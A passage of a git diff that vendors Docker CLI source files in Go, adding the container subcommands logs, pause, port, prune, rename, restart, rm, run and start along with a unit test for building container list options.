+		if len(dockerCli.ConfigFile().PsFormat) > 0 && !opts.quiet {
+			format = dockerCli.ConfigFile().PsFormat
+		} else {
+			format = formatter.TableFormatKey
+		}
+	}
+
+	containerCtx := formatter.Context{
+		Output: dockerCli.Out(),
+		Format: formatter.NewContainerFormat(format, opts.quiet, listOptions.Size),
+		Trunc:  !opts.noTrunc,
+	}
+	return formatter.ContainerWrite(containerCtx, containers)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/logs.go b/vendor/github.com/docker/docker/cli/command/container/logs.go
new file mode 100644
index 0000000000..3a37cedf43
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/logs.go
@@ -0,0 +1,87 @@
+package container
+
+import (
+	"fmt"
+	"io"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/stdcopy"
+	"github.com/spf13/cobra"
+)
+
+var validDrivers = map[string]bool{
+	"json-file": true,
+	"journald":  true,
+}
+
+type logsOptions struct {
+	follow     bool
+	since      string
+	timestamps bool
+	details    bool
+	tail       string
+
+	container string
+}
+
+// NewLogsCommand creates a new cobra.Command for `docker logs`
+func NewLogsCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts logsOptions
+
+	cmd := &cobra.Command{
+		Use:   "logs [OPTIONS] CONTAINER",
+		Short: "Fetch the logs of a container",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.container = args[0]
+			return runLogs(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.follow, "follow", "f", false, "Follow log output")
+	flags.StringVar(&opts.since, "since", "", "Show logs since timestamp")
+	flags.BoolVarP(&opts.timestamps, "timestamps", "t", false, "Show timestamps")
+	flags.BoolVar(&opts.details, "details", false, "Show extra details provided to logs")
+	flags.StringVar(&opts.tail, "tail", "all", "Number of lines to show from the end of the logs")
+	return cmd
+}
+
+func runLogs(dockerCli *command.DockerCli, opts *logsOptions) error {
+	ctx := context.Background()
+
+	c, err := dockerCli.Client().ContainerInspect(ctx, opts.container)
+	if err != nil {
+		return err
+	}
+
+	if !validDrivers[c.HostConfig.LogConfig.Type] {
+		return fmt.Errorf("\"logs\" command is supported only for \"json-file\" and \"journald\" logging drivers (got: %s)", c.HostConfig.LogConfig.Type)
+	}
+
+	options := types.ContainerLogsOptions{
+		ShowStdout: true,
+		ShowStderr: true,
+		Since:      opts.since,
+		Timestamps: opts.timestamps,
+		Follow:     opts.follow,
+		Tail:       opts.tail,
+		Details:    opts.details,
+	}
+	responseBody, err := dockerCli.Client().ContainerLogs(ctx, opts.container, options)
+	if err != nil {
+		return err
+	}
+	defer responseBody.Close()
+
+	if c.Config.Tty {
+		_, err = io.Copy(dockerCli.Out(), responseBody)
+	} else {
+		_, err = stdcopy.StdCopy(dockerCli.Out(), dockerCli.Err(), responseBody)
+	}
+	return err
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/pause.go b/vendor/github.com/docker/docker/cli/command/container/pause.go
new file mode 100644
index 0000000000..6817cf60eb
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/pause.go
@@ -0,0 +1,49 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type pauseOptions struct {
+	containers []string
+}
+
+// NewPauseCommand creates a new cobra.Command for `docker pause`
+func NewPauseCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts pauseOptions
+
+	return &cobra.Command{
+		Use:   "pause CONTAINER [CONTAINER...]",
+		Short: "Pause all processes within one or more containers",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.containers = args
+			return runPause(dockerCli, &opts)
+		},
+	}
+}
+
+func runPause(dockerCli *command.DockerCli, opts *pauseOptions) error {
+	ctx := context.Background()
+
+	var errs []string
+	errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerPause)
+	for _, container := range opts.containers {
+		if err := <-errChan; err != nil {
+			errs = append(errs, err.Error())
+		} else {
+			fmt.Fprintf(dockerCli.Out(), "%s\n", container)
+		}
+	}
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/port.go b/vendor/github.com/docker/docker/cli/command/container/port.go
new file mode 100644
index 0000000000..ea15290145
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/port.go
@@ -0,0 +1,78 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/go-connections/nat"
+	"github.com/spf13/cobra"
+)
+
+type portOptions struct {
+	container string
+
+	port string
+}
+
+// NewPortCommand creates a new cobra.Command for `docker port`
+func NewPortCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts portOptions
+
+	cmd := &cobra.Command{
+		Use:   "port CONTAINER [PRIVATE_PORT[/PROTO]]",
+		Short: "List port mappings or a specific mapping for the container",
+		Args:  cli.RequiresRangeArgs(1, 2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.container = args[0]
+			if len(args) > 1 {
+				opts.port = args[1]
+			}
+			return runPort(dockerCli, &opts)
+		},
+	}
+	return cmd
+}
+
+func runPort(dockerCli *command.DockerCli, opts *portOptions) error {
+	ctx := context.Background()
+
+	c, err := dockerCli.Client().ContainerInspect(ctx, opts.container)
+	if err != nil {
+		return err
+	}
+
+	if opts.port != "" {
+		port := opts.port
+		proto := "tcp"
+		parts := strings.SplitN(port, "/", 2)
+
+		if len(parts) == 2 && len(parts[1]) != 0 {
+			port = parts[0]
+			proto = parts[1]
+		}
+		natPort := port + "/" + proto
+		newP, err := nat.NewPort(proto, port)
+		if err != nil {
+			return err
+		}
+		if frontends, exists := c.NetworkSettings.Ports[newP]; exists && frontends != nil {
+			for _, frontend := range frontends {
+				fmt.Fprintf(dockerCli.Out(), "%s:%s\n", frontend.HostIP, frontend.HostPort)
+			}
+			return nil
+		}
+		return fmt.Errorf("Error: No public port '%s' published for %s", natPort, opts.container)
+	}
+
+	for from, frontends := range c.NetworkSettings.Ports {
+		for _, frontend := range frontends {
+			fmt.Fprintf(dockerCli.Out(), "%s -> %s:%s\n", from, frontend.HostIP, frontend.HostPort)
+		}
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/prune.go b/vendor/github.com/docker/docker/cli/command/container/prune.go
new file mode 100644
index 0000000000..064f4c08e0
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/prune.go
@@ -0,0 +1,75 @@
+package container
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	units "github.com/docker/go-units"
+	"github.com/spf13/cobra"
+)
+
+type pruneOptions struct {
+	force bool
+}
+
+// NewPruneCommand returns a new cobra prune command for containers
+func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts pruneOptions
+
+	cmd := &cobra.Command{
+		Use:   "prune [OPTIONS]",
+		Short: "Remove all stopped containers",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			spaceReclaimed, output, err := runPrune(dockerCli, opts)
+			if err != nil {
+				return err
+			}
+			if output != "" {
+				fmt.Fprintln(dockerCli.Out(), output)
+			}
+			fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed)))
+			return nil
+		},
+		Tags: map[string]string{"version": "1.25"},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation")
+
+	return cmd
+}
+
+const warning = `WARNING! This will remove all stopped containers.
+Are you sure you want to continue?`
+
+func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) {
+	if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) {
+		return
+	}
+
+	report, err := dockerCli.Client().ContainersPrune(context.Background(), filters.Args{})
+	if err != nil {
+		return
+	}
+
+	if len(report.ContainersDeleted) > 0 {
+		output = "Deleted Containers:\n"
+		for _, id := range report.ContainersDeleted {
+			output += id + "\n"
+		}
+		spaceReclaimed = report.SpaceReclaimed
+	}
+
+	return
+}
+
+// RunPrune calls the Container Prune API
+// This returns the amount of space reclaimed and a detailed output string
+func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) {
+	return runPrune(dockerCli, pruneOptions{force: true})
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/ps_test.go b/vendor/github.com/docker/docker/cli/command/container/ps_test.go
new file mode 100644
index 0000000000..62b0545274
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/ps_test.go
@@ -0,0 +1,118 @@
+package container
+
+import (
+	"testing"
+
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestBuildContainerListOptions(t *testing.T) {
+	filters := opts.NewFilterOpt()
+	assert.NilError(t, filters.Set("foo=bar"))
+	assert.NilError(t, filters.Set("baz=foo"))
+
+	contexts := []struct {
+		psOpts          *psOptions
+		expectedAll     bool
+		expectedSize    bool
+		expectedLimit   int
+		expectedFilters map[string]string
+	}{
+		{
+			psOpts: &psOptions{
+				all:    true,
+				size:   true,
+				last:   5,
+				filter: filters,
+			},
+			expectedAll:   true,
+			expectedSize:  true,
+			expectedLimit: 5,
+			expectedFilters: map[string]string{
+				"foo": "bar",
+				"baz": "foo",
+			},
+		},
+		{
+			psOpts: &psOptions{
+				all:     true,
+				size:    true,
+				last:    -1,
+				nLatest: true,
+			},
+			expectedAll:     true,
+			expectedSize:    true,
+			expectedLimit:   1,
+			expectedFilters: make(map[string]string),
+		},
+		{
+			psOpts: &psOptions{
+				all:    true,
+				size:   false,
+				last:   5,
+				filter: filters,
+				// With .Size, size should be true
+				format: "{{.Size}}",
+			},
+			expectedAll:   true,
+			expectedSize:  true,
+			expectedLimit: 5,
+			expectedFilters: map[string]string{
+				"foo": "bar",
+				"baz": "foo",
+			},
+		},
+		{
+			psOpts: &psOptions{
+				all:    true,
+				size:   false,
+				last:   5,
+				filter: filters,
+				// With .Size, size should be true
+				format: "{{.Size}} {{.CreatedAt}} {{.Networks}}",
+			},
+			expectedAll:   true,
+			expectedSize:  true,
+			expectedLimit: 5,
+			expectedFilters: map[string]string{
+				"foo": "bar",
+				"baz": "foo",
+			},
+		},
+		{
+			psOpts: &psOptions{
+				all:    true,
+				size:   false,
+				last:   5,
+				filter: filters,
+				// Without .Size, size should be false
+				format: "{{.CreatedAt}} {{.Networks}}",
+			},
+			expectedAll:   true,
+			expectedSize:  false,
+			expectedLimit: 5,
+			expectedFilters: map[string]string{
+				"foo": "bar",
+				"baz": "foo",
+			},
+		},
+	}
+
+	for _, c := range contexts {
+		options, err := buildContainerListOptions(c.psOpts)
+		assert.NilError(t, err)
+
+		assert.Equal(t, c.expectedAll, options.All)
+		assert.Equal(t, c.expectedSize, options.Size)
+		assert.Equal(t, c.expectedLimit, options.Limit)
+		assert.Equal(t, options.Filters.Len(), len(c.expectedFilters))
+
+		for k, v := range c.expectedFilters {
+			f := options.Filters
+			if !f.ExactMatch(k, v) {
+				t.Fatalf("Expected filter with key %s to be %s but got %s", k, v, f.Get(k))
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/rename.go b/vendor/github.com/docker/docker/cli/command/container/rename.go
new file mode 100644
index 0000000000..346fb7b3b9
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/rename.go
@@ -0,0 +1,51 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type renameOptions struct {
+	oldName string
+	newName string
+}
+
+// NewRenameCommand creates a new cobra.Command for `docker rename`
+func NewRenameCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts renameOptions
+
+	cmd := &cobra.Command{
+		Use:   "rename CONTAINER NEW_NAME",
+		Short: "Rename a container",
+		Args:  cli.ExactArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.oldName = args[0]
+			opts.newName = args[1]
+			return runRename(dockerCli, &opts)
+		},
+	}
+	return cmd
+}
+
+func runRename(dockerCli *command.DockerCli, opts *renameOptions) error {
+	ctx := context.Background()
+
+	oldName := strings.TrimSpace(opts.oldName)
+	newName := strings.TrimSpace(opts.newName)
+
+	if oldName == "" || newName == "" {
+		return fmt.Errorf("Error: Neither old nor new names may be empty")
+	}
+
+	if err := dockerCli.Client().ContainerRename(ctx, oldName, newName); err != nil {
+		fmt.Fprintf(dockerCli.Err(), "%s\n", err)
+		return fmt.Errorf("Error: failed to rename container named %s", oldName)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/restart.go b/vendor/github.com/docker/docker/cli/command/container/restart.go
new file mode 100644
index 0000000000..fc3ba93c84
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/restart.go
@@ -0,0 +1,62 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type restartOptions struct {
+	nSeconds        int
+	nSecondsChanged bool
+
+	containers []string
+}
+
+// NewRestartCommand creates a new cobra.Command for `docker restart`
+func NewRestartCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts restartOptions
+
+	cmd := &cobra.Command{
+		Use:   "restart [OPTIONS] CONTAINER [CONTAINER...]",
+		Short: "Restart one or more containers",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.containers = args
+			opts.nSecondsChanged = cmd.Flags().Changed("time")
+			return runRestart(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.IntVarP(&opts.nSeconds, "time", "t", 10, "Seconds to wait for stop before killing the container")
+	return cmd
+}
+
+func runRestart(dockerCli *command.DockerCli, opts *restartOptions) error {
+	ctx := context.Background()
+	var errs []string
+	var timeout *time.Duration
+	if opts.nSecondsChanged {
+		timeoutValue := time.Duration(opts.nSeconds) * time.Second
+		timeout = &timeoutValue
+	}
+
+	for _, name := range opts.containers {
+		if err := dockerCli.Client().ContainerRestart(ctx, name, timeout); err != nil {
+			errs = append(errs, err.Error())
+		} else {
+			fmt.Fprintf(dockerCli.Out(), "%s\n", name)
+		}
+	}
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/rm.go b/vendor/github.com/docker/docker/cli/command/container/rm.go
new file mode 100644
index 0000000000..60724f194b
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/rm.go
@@ -0,0 +1,73 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type rmOptions struct {
+	rmVolumes bool
+	rmLink    bool
+	force     bool
+
+	containers []string
+}
+
+// NewRmCommand creates a new cobra.Command for `docker rm`
+func NewRmCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts rmOptions
+
+	cmd := &cobra.Command{
+		Use:   "rm [OPTIONS] CONTAINER [CONTAINER...]",
+		Short: "Remove one or more containers",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.containers = args
+			return runRm(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.rmVolumes, "volumes", "v", false, "Remove the volumes associated with the container")
+	flags.BoolVarP(&opts.rmLink, "link", "l", false, "Remove the specified link")
+	flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of a running container (uses SIGKILL)")
+	return cmd
+}
+
+func runRm(dockerCli *command.DockerCli, opts *rmOptions) error {
+	ctx := context.Background()
+
+	var errs []string
+	options := types.ContainerRemoveOptions{
+		RemoveVolumes: opts.rmVolumes,
+		RemoveLinks:   opts.rmLink,
+		Force:         opts.force,
+	}
+
+	errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error {
+		if container == "" {
+			return fmt.Errorf("Container name cannot be empty")
+		}
+		container = strings.Trim(container, "/")
+		return dockerCli.Client().ContainerRemove(ctx, container, options)
+	})
+
+	for _, name := range opts.containers {
+		if err := <-errChan; err != nil {
+			errs = append(errs, err.Error())
+		} else {
+			fmt.Fprintf(dockerCli.Out(), "%s\n", name)
+		}
+	}
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/run.go b/vendor/github.com/docker/docker/cli/command/container/run.go
new file mode 100644
index 0000000000..0fad93e688
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/run.go
@@ -0,0 +1,285 @@
+package container
+
+import (
+	"fmt"
+	"io"
+	"net/http/httputil"
+	"os"
+	"runtime"
+	"strings"
+	"syscall"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	opttypes "github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/promise"
+	"github.com/docker/docker/pkg/signal"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/docker/libnetwork/resolvconf/dns"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+)
+
+type runOptions struct {
+	detach     bool
+	sigProxy   bool
+	name       string
+	detachKeys string
+}
+
+// NewRunCommand create a new `docker run` command
+func NewRunCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts runOptions
+	var copts *runconfigopts.ContainerOptions
+
+	cmd := &cobra.Command{
+		Use:   "run [OPTIONS] IMAGE [COMMAND] [ARG...]",
+		Short: "Run a command in a new container",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			copts.Image = args[0]
+			if len(args) > 1 {
+				copts.Args = args[1:]
+			}
+			return runRun(dockerCli, cmd.Flags(), &opts, copts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.SetInterspersed(false)
+
+	// These are flags not stored in Config/HostConfig
+	flags.BoolVarP(&opts.detach, "detach", "d", false, "Run container in background and print container ID")
+	flags.BoolVar(&opts.sigProxy, "sig-proxy", true, "Proxy received signals to the process")
+	flags.StringVar(&opts.name, "name", "", "Assign a name to the container")
+	flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container")
+
+	// Add an explicit help that doesn't have a `-h` to prevent the conflict
+	// with hostname
+	flags.Bool("help", false, "Print usage")
+
+	command.AddTrustedFlags(flags, true)
+	copts = runconfigopts.AddFlags(flags)
+	return cmd
+}
+
+func runRun(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *runOptions, copts *runconfigopts.ContainerOptions) error {
+	stdout, stderr, stdin := dockerCli.Out(), dockerCli.Err(), dockerCli.In()
+	client := dockerCli.Client()
+	// TODO: pass this as an argument
+	cmdPath := "run"
+
+	var (
+		flAttach                              *opttypes.ListOpts
+		ErrConflictAttachDetach               = fmt.Errorf("Conflicting options: -a and -d")
+		ErrConflictRestartPolicyAndAutoRemove = fmt.Errorf("Conflicting options: --restart and --rm")
+	)
+
+	config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts)
+
+	// just in case the Parse does not exit
+	if err != nil {
+		reportError(stderr, cmdPath, err.Error(), true)
+		return cli.StatusError{StatusCode: 125}
+	}
+
+	if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() {
+		return ErrConflictRestartPolicyAndAutoRemove
+	}
+	if hostConfig.OomKillDisable != nil && *hostConfig.OomKillDisable && hostConfig.Memory == 0 {
+		fmt.Fprintf(stderr, "WARNING: Disabling the OOM killer on containers without setting a '-m/--memory' limit may be dangerous.\n")
+	}
+
+	if len(hostConfig.DNS) > 0 {
+		// check the DNS settings passed via --dns against
+		// localhost regexp to warn if they are trying to
+		// set a DNS to a localhost address
+		for _, dnsIP := range hostConfig.DNS {
+			if dns.IsLocalhost(dnsIP) {
+				fmt.Fprintf(stderr, "WARNING: Localhost DNS setting (--dns=%s) may fail in containers.\n", dnsIP)
+				break
+			}
+		}
+	}
+
+	config.ArgsEscaped = false
+
+	if !opts.detach {
+		if err := dockerCli.In().CheckTty(config.AttachStdin, config.Tty); err != nil {
+			return err
+		}
+	} else {
+		if fl := flags.Lookup("attach"); fl != nil {
+			flAttach = fl.Value.(*opttypes.ListOpts)
+			if flAttach.Len() != 0 {
+				return ErrConflictAttachDetach
+			}
+		}
+
+		config.AttachStdin = false
+		config.AttachStdout = false
+		config.AttachStderr = false
+		config.StdinOnce = false
+	}
+
+	// Disable sigProxy when in TTY mode
+	if config.Tty {
+		opts.sigProxy = false
+	}
+
+	// Telling the Windows daemon the initial size of the tty during start makes
+	// a far better user experience rather than relying on subsequent resizes
+	// to cause things to catch up.
+	if runtime.GOOS == "windows" {
+		hostConfig.ConsoleSize[0], hostConfig.ConsoleSize[1] = dockerCli.Out().GetTtySize()
+	}
+
+	ctx, cancelFun := context.WithCancel(context.Background())
+
+	createResponse, err := createContainer(ctx, dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name)
+	if err != nil {
+		reportError(stderr, cmdPath, err.Error(), true)
+		return runStartContainerErr(err)
+	}
+	if opts.sigProxy {
+		sigc := ForwardAllSignals(ctx, dockerCli, createResponse.ID)
+		defer signal.StopCatch(sigc)
+	}
+	var (
+		waitDisplayID chan struct{}
+		errCh         chan error
+	)
+	if !config.AttachStdout && !config.AttachStderr {
+		// Make this asynchronous to allow the client to write to stdin before having to read the ID
+		waitDisplayID = make(chan struct{})
+		go func() {
+			defer close(waitDisplayID)
+			fmt.Fprintf(stdout, "%s\n", createResponse.ID)
+		}()
+	}
+	attach := config.AttachStdin || config.AttachStdout || config.AttachStderr
+	if attach {
+		var (
+			out, cerr io.Writer
+			in        io.ReadCloser
+		)
+		if config.AttachStdin {
+			in = stdin
+		}
+		if config.AttachStdout {
+			out = stdout
+		}
+		if config.AttachStderr {
+			if config.Tty {
+				cerr = stdout
+			} else {
+				cerr = stderr
+			}
+		}
+
+		if opts.detachKeys != "" {
+			dockerCli.ConfigFile().DetachKeys = opts.detachKeys
+		}
+
+		options := types.ContainerAttachOptions{
+			Stream:     true,
+			Stdin:      config.AttachStdin,
+			Stdout:     config.AttachStdout,
+			Stderr:     config.AttachStderr,
+			DetachKeys: dockerCli.ConfigFile().DetachKeys,
+		}
+
+		resp, errAttach := client.ContainerAttach(ctx, createResponse.ID, options)
+		if errAttach != nil && errAttach != httputil.ErrPersistEOF {
+			// ContainerAttach returns an ErrPersistEOF (connection closed)
+			// means server met an error and put it in Hijacked connection
+			// keep the error and read detailed error message from hijacked connection later
+			return errAttach
+		}
+		defer resp.Close()
+
+		errCh = promise.Go(func() error {
+			errHijack := holdHijackedConnection(ctx, dockerCli, config.Tty, in, out, cerr, resp)
+			if errHijack == nil {
+				return errAttach
+			}
+			return errHijack
+		})
+	}
+
+	statusChan := waitExitOrRemoved(ctx, dockerCli, createResponse.ID, hostConfig.AutoRemove)
+
+	//start the container
+	if err := client.ContainerStart(ctx, createResponse.ID, types.ContainerStartOptions{}); err != nil {
+		// If we have holdHijackedConnection, we should notify
+		// holdHijackedConnection we are going to exit and wait
+		// to avoid the terminal are not restored.
+		if attach {
+			cancelFun()
+			<-errCh
+		}
+
+		reportError(stderr, cmdPath, err.Error(), false)
+		if hostConfig.AutoRemove {
+			// wait container to be removed
+			<-statusChan
+		}
+		return runStartContainerErr(err)
+	}
+
+	if (config.AttachStdin || config.AttachStdout || config.AttachStderr) && config.Tty && dockerCli.Out().IsTerminal() {
+		if err := MonitorTtySize(ctx, dockerCli, createResponse.ID, false); err != nil {
+			fmt.Fprintf(stderr, "Error monitoring TTY size: %s\n", err)
+		}
+	}
+
+	if errCh != nil {
+		if err := <-errCh; err != nil {
+			logrus.Debugf("Error hijack: %s", err)
+			return err
+		}
+	}
+
+	// Detached mode: wait for the id to be displayed and return.
+	if !config.AttachStdout && !config.AttachStderr {
+		// Detached mode
+		<-waitDisplayID
+		return nil
+	}
+
+	status := <-statusChan
+	if status != 0 {
+		return cli.StatusError{StatusCode: status}
+	}
+	return nil
+}
+
+// reportError is a utility method that prints a user-friendly message
+// containing the error that occurred during parsing and a suggestion to get help
+func reportError(stderr io.Writer, name string, str string, withHelp bool) {
+	if withHelp {
+		str += ".\nSee '" + os.Args[0] + " " + name + " --help'"
+	}
+	fmt.Fprintf(stderr, "%s: %s.\n", os.Args[0], str)
+}
+
+// if container start fails with 'not found'/'no such' error, return 127
+// if container start fails with 'permission denied' error, return 126
+// return 125 for generic docker daemon failures
+func runStartContainerErr(err error) error {
+	trimmedErr := strings.TrimPrefix(err.Error(), "Error response from daemon: ")
+	statusError := cli.StatusError{StatusCode: 125}
+	if strings.Contains(trimmedErr, "executable file not found") ||
+		strings.Contains(trimmedErr, "no such file or directory") ||
+		strings.Contains(trimmedErr, "system cannot find the file specified") {
+		statusError = cli.StatusError{StatusCode: 127}
+	} else if strings.Contains(trimmedErr, syscall.EACCES.Error()) {
+		statusError = cli.StatusError{StatusCode: 126}
+	}
+
+	return statusError
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/start.go b/vendor/github.com/docker/docker/cli/command/container/start.go
new file mode 100644
index 0000000000..3521a41949
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/start.go
@@ -0,0 +1,179 @@
+package container
+
+import (
+	"fmt"
+	"io"
+	"net/http/httputil"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/promise"
+	"github.com/docker/docker/pkg/signal"
+	"github.com/spf13/cobra"
+)
+
+type startOptions struct {
+	attach        bool
+	openStdin     bool
+	detachKeys    string
+	checkpoint    string
+	checkpointDir string
+
+	containers []string
+}
+
+// NewStartCommand creates a new cobra.Command for `docker start`
+func NewStartCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts startOptions
+
+	cmd := &cobra.Command{
+		Use:   "start [OPTIONS] CONTAINER [CONTAINER...]",
+		Short: "Start one or more stopped containers",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.containers = args
+			return runStart(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.attach, "attach", "a", false, "Attach STDOUT/STDERR and forward signals")
+	flags.BoolVarP(&opts.openStdin, "interactive", "i", false, "Attach container's STDIN")
+	flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container")
+
+	flags.StringVar(&opts.checkpoint, "checkpoint", "", "Restore from this checkpoint")
+	flags.SetAnnotation("checkpoint", "experimental", nil)
+	flags.StringVar(&opts.checkpointDir, "checkpoint-dir", "", "Use a custom checkpoint storage directory")
+	flags.SetAnnotation("checkpoint-dir", "experimental", nil)
+	return cmd
+}
+
+func runStart(dockerCli *command.DockerCli, opts *startOptions) error {
+	ctx, cancelFun := context.WithCancel(context.Background())
+
+	if opts.attach || opts.openStdin {
+		// We're going to attach to a container.
+		// 1. Ensure we only have one container.
+		if len(opts.containers) > 1 {
+			return fmt.Errorf("You cannot start and attach multiple containers at once.")
+		}
+
+		// 2. Attach to the container.
+		container := opts.containers[0]
+		c, err := dockerCli.Client().ContainerInspect(ctx, container)
+		if err != nil {
+			return err
+		}
+
+		// We always use c.ID instead of container to maintain consistency during `docker start`
+		if !c.Config.Tty {
+			sigc := ForwardAllSignals(ctx, dockerCli, c.ID)
+			defer signal.StopCatch(sigc)
+		}
+
+		if opts.detachKeys != "" {
+			dockerCli.ConfigFile().DetachKeys = opts.detachKeys
+		}
+
+		options := types.ContainerAttachOptions{
+			Stream:     true,
+			Stdin:      opts.openStdin && c.Config.OpenStdin,
+			Stdout:     true,
+			Stderr:     true,
+			DetachKeys: dockerCli.ConfigFile().DetachKeys,
+		}
+
+		var in io.ReadCloser
+
+		if options.Stdin {
+			in = dockerCli.In()
+		}
+
+		resp, errAttach := dockerCli.Client().ContainerAttach(ctx, c.ID, options)
+		if errAttach != nil && errAttach != httputil.ErrPersistEOF {
+			// ContainerAttach return an ErrPersistEOF (connection closed)
+			// means server met an error and already put it in Hijacked connection,
+			// we would keep the error and read the detailed error message from hijacked connection
+			return errAttach
+		}
+		defer resp.Close()
+		cErr := promise.Go(func() error {
+			errHijack := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp)
+			if errHijack == nil {
+				return errAttach
+			}
+			return errHijack
+		})
+
+		// 3. We should open a channel for receiving status code of the container
+		// no matter it's detached, removed on daemon side(--rm) or exit normally.
+		statusChan := waitExitOrRemoved(ctx, dockerCli, c.ID, c.HostConfig.AutoRemove)
+		startOptions := types.ContainerStartOptions{
+			CheckpointID:  opts.checkpoint,
+			CheckpointDir: opts.checkpointDir,
+		}
+
